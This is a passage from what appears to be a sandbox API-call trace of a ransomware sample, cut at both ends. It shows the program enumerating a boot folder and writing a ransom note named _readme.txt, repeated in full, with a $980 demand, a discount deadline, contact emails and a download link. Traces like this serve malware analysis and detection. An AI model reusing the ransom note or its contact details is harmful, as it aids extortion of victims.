dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.996] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.000] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0094.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.000] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.000] PathFindFileNameW (pszPath="") returned="" [0094.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.000] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.002] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.002] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.002] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.002] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.003] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0094.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.004] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.004] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.004] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.005] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.005] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.006] CloseHandle (hObject=0x5c8) returned 1 [0094.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.007] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1917720, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.008] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1917720, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.008] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.008] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: 